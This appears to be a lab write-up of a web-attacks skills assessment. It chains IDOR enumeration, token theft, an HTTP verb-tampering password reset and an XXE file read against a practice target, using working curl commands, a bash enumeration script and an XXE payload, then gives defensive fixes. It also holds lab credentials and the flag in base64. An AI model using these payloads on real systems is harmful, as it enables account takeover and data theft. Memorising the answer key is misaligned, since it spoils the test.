🎯Skills Assessment

🎯 Objective: Comprehensive skills assessment demonstrating attack chaining across multiple web vulnerabilities to achieve privilege escalation and flag extraction.

Overview

This assessment combines three major attack vectors from the Web Attacks module:

1. IDOR (Insecure Direct Object References) - User enumeration and token extraction

2. HTTP Verb Tampering - Authorization bypass

3. XXE Injection - Sensitive file disclosure

Target Goal: Read the flag at /flag.php

---

Attack Chain Walkthrough

Phase 1: Initial Access & IDOR Discovery

Step 1: Login with Provided Credentials

# Default credentials for initial access
Username: htb-student
Password: Academy_student!

Methodology:

1. Open Network tab in Developer Tools (F12)

2. Login and monitor HTTP requests

3. Identify API endpoints in network traffic

Step 2: Discover IDOR in User API

API Endpoint Discovered: /api.php/user/74

Initial Request Analysis:

GET /api.php/user/74 HTTP/1.1
Host: target.com
Cookie: PHPSESSID=abc123...

Response:

{
  "uid": "74",
  "username": "htb-student", 
  "full_name": "HTB Student",
  "company": "Student"
}

Step 3: Test IDOR Vulnerability

Manual IDOR Testing:

# Test different user IDs
curl -H "Cookie: PHPSESSID=abc123..." "http://target.com/api.php/user/75"
curl -H "Cookie: PHPSESSID=abc123..." "http://target.com/api.php/user/1"

Vulnerability Confirmed: ✅ Returns data for other users without authorization

---

Phase 2: User Enumeration & Admin Discovery

Step 4: Mass User Enumeration

Automated Enumeration Script:

#!/bin/bash
# user-enum.sh - IDOR user enumeration

echo "Enumerating users 1-100..."

for uid in {1..100}; do
    response=$(curl -s -H "Cookie: PHPSESSID=[SESSION]" \
        "http://target.com/api.php/user/$uid")
    
    if [[ $response == *"uid"* ]]; then
        echo "UID $uid: $response"
    fi
done

Execution:

chmod +x user-enum.sh
./user-enum.sh | tee users.txt

Step 5: Identify Administrative Users

Search for Admin Privileges:

# Filter for admin/administrator roles
cat users.txt | grep -i "admin" | jq .

# Expected output:
{
  "uid": "52",
  "username": "a.corrales", 
  "full_name": "Amor Corrales",
  "company": "Administrator"
}

🎯 Target Identified: User a.corrales (UID: 52) has Administrator privileges

---

Phase 3: Token Extraction via IDOR

Step 6: Analyze Password Reset Functionality

Discovery Process:

1. Navigate to Settings → Change Password

2. Monitor network requests in Developer Tools

3. Identify token retrieval endpoint

Token API Discovered: /api.php/token/74

Normal Token Request:

GET /api.php/token/74 HTTP/1.1
Host: target.com
Cookie: PHPSESSID=abc123...

Response: e51a8a14-17ac-11ec-8e67-a3c050fe0c26

Step 7: Extract Admin User Token

IDOR Token Extraction:

# Extract token for admin user (UID: 52)
curl -s -H "Cookie: PHPSESSID=[SESSION]" \
    "http://target.com/api.php/token/52"

# Response: e51a85fa-17ac-11ec-8e51-e78234eb7b0c

🔑 Admin Token Obtained: e51a85fa-17ac-11ec-8e51-e78234eb7b0c

---

Phase 4: HTTP Verb Tampering for Authorization Bypass

Step 8: Analyze Password Reset Mechanism

Reset Password Endpoint: /reset.php

Normal POST Request Structure:

POST /reset.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=abc123...

uid=74&token=e51a8a14-17ac-11ec-8e67-a3c050fe0c26&password=newpass123

Step 9: Attempt Direct Password Reset (Fails)

Direct Reset Attempt:

curl -X POST "http://target.com/reset.php" \
    -H "Cookie: PHPSESSID=[SESSION]" \
    -d "uid=52&token=e51a85fa-17ac-11ec-8e51-e78234eb7b0c&password=newpass123"

# Response: "Access Denied"
# Backend checks PHPSESSID against UID

Step 10: HTTP Verb Tampering Bypass

Generate Strong Password:

# Generate secure password
openssl rand -hex 16
# Output: f0e18de14fdadfc38350d97ff7284a25

Bypass with GET Method:

# Convert POST to GET request
curl "http://target.com/reset.php?uid=52&token=e51a85fa-17ac-11ec-8e51-e78234eb7b0c&password=f0e18de14fdadfc38350d97ff7284a25" \
    -H "Cookie: PHPSESSID=[SESSION]"

# Response: "Password Updated Successfully"

✅ Success: Authorization bypass via HTTP verb tampering

---

Phase 5: Admin Access & XXE Discovery

Step 11: Login as Administrator

Admin Login:

Username: a.corrales
Password: f0e18de14fdadfc38350d97ff7284a25

New Features Unlocked:

• ✅ Administrative dashboard access

• ✅ "ADD EVENT" functionality (previously hidden)

Step 12: Discover XXE Injection Point

Event Creation Analysis:

1. Navigate to ADD EVENT functionality

2. Fill form with dummy data

3. Intercept request in Burp Suite/Network tab

XXE Injection Point Found:

POST /addEvent.php HTTP/1.1
Host: target.com
Content-Type: application/xml
Cookie: PHPSESSID=admin_session...

<root>
    <name>Test Event</name>
    <details>Test Description</details>
    <date>2021-09-22</date>
</root>

🎯 XML Input Identified: Application accepts XML data for event creation

---

Phase 6: XXE File Disclosure

Step 13: Craft XXE Payload for Flag Extraction

XXE Payload Construction:

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.php"> ]>
<root>
    <name>&xxe;</name>
    <details>XXE Test</details>
    <date>2021-09-22</date>
</root>

Payload Breakdown:

• <!DOCTYPE replace [...]> - External entity definition

• php://filter/convert.base64-encode/resource=/flag.php - PHP filter to avoid XML parsing issues

• &xxe; - Entity reference in name field (displayed in response)

Step 14: Execute XXE Attack

Manual Exploitation:

# Send XXE payload via curl
curl -X POST "http://target.com/addEvent.php" \
    -H "Content-Type: application/xml" \
    -H "Cookie: PHPSESSID=[ADMIN_SESSION]" \
    -d '<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.php"> ]>
<root>
    <name>&xxe;</name>
    <details>XXE Test</details>
    <date>2021-09-22</date>
</root>'

Response Contains Base64:

PD9waHAgJGZsYWcgPSAiSFRCe200NTczcl93M2JfNDc3NGNrM3J9IjsgPz4K

Step 15: Decode Flag

Base64 Decoding:

echo 'PD9waHAgJGZsYWcgPSAiSFRCe200NTczcl93M2JfNDc3NGNrM3J9IjsgPz4K' | base64 -d

# Output: <?php $flag = "HTB{...}"; ?>

🏆 Final Flag: HTB{...}

---

Attack Chain Summary

graph TD
    A[Initial Access<br/>htb-student] --> B[IDOR Discovery<br/>/api.php/user/ID]
    B --> C[User Enumeration<br/>UIDs 1-100]
    C --> D[Admin User Found<br/>a.corrales UID:52]
    D --> E[Token Extraction<br/>/api.php/token/52]
    E --> F[Password Reset Attempt<br/>POST /reset.php]
    F --> G[Authorization Bypass<br/>GET Method]
    G --> H[Admin Access<br/>a.corrales login]
    H --> I[XXE Discovery<br/>/addEvent.php XML]
    I --> J[Flag Extraction<br/>php://filter XXE]
    J --> K[Mission Complete<br/>HTB{...}]

---

Key Learning Points

1. IDOR Exploitation Techniques

• ✅ Sequential ID enumeration (1-100)

• ✅ API endpoint discovery through traffic analysis

• ✅ Multi-step IDOR (user data → tokens)

• ✅ Privilege escalation via user enumeration

2. HTTP Verb Tampering Applications

• ✅ Authorization bypass (POST → GET conversion)

• ✅ Session-based security control evasion

• ✅ Parameter injection through URL manipulation

3. XXE Injection for File Disclosure

• ✅ PHP filter usage for binary/special character handling

• ✅ Entity reference in XML elements

• ✅ Base64 encoding/decoding for file extraction

4. Attack Chaining Methodology

• ✅ Reconnaissance → Traffic analysis and endpoint discovery

• ✅ Vulnerability Assessment → Systematic testing across attack vectors

• ✅ Exploitation → Combining multiple vulnerabilities for privilege escalation

• ✅ Post-Exploitation → Administrative access and sensitive data extraction

---

Defensive Recommendations

IDOR Prevention

// Secure implementation with authorization checks
if ($_SESSION['user_id'] != $requested_uid && !is_admin($_SESSION['user_id'])) {
    http_response_code(403);
    die("Access Denied");
}

HTTP Method Restrictions

# .htaccess - Restrict reset.php to POST only
<Files "reset.php">
    <RequireAll>
        Require method POST
    </RequireAll>
</Files>

XXE Prevention

// Disable external entity loading
libxml_disable_entity_loader(true);

// Or use secure XML parsing
$dom = new DOMDocument();
$dom->resolveExternals = false;
$dom->substituteEntities = false;

---

Tools & Resources

Automation Scripts

• User Enumeration: Custom bash script for IDOR testing

• Burp Suite: Request modification and response analysis

• curl: Command-line HTTP testing and exploitation

Detection Techniques

• Network Traffic Analysis: Browser Developer Tools

• Response Pattern Recognition: Identifying successful vs. failed requests

• Parameter Manipulation: Systematic testing of input vectors

💡 Skills Demonstrated: This assessment showcases the critical importance of defense-in-depth and proper input validation across all application layers.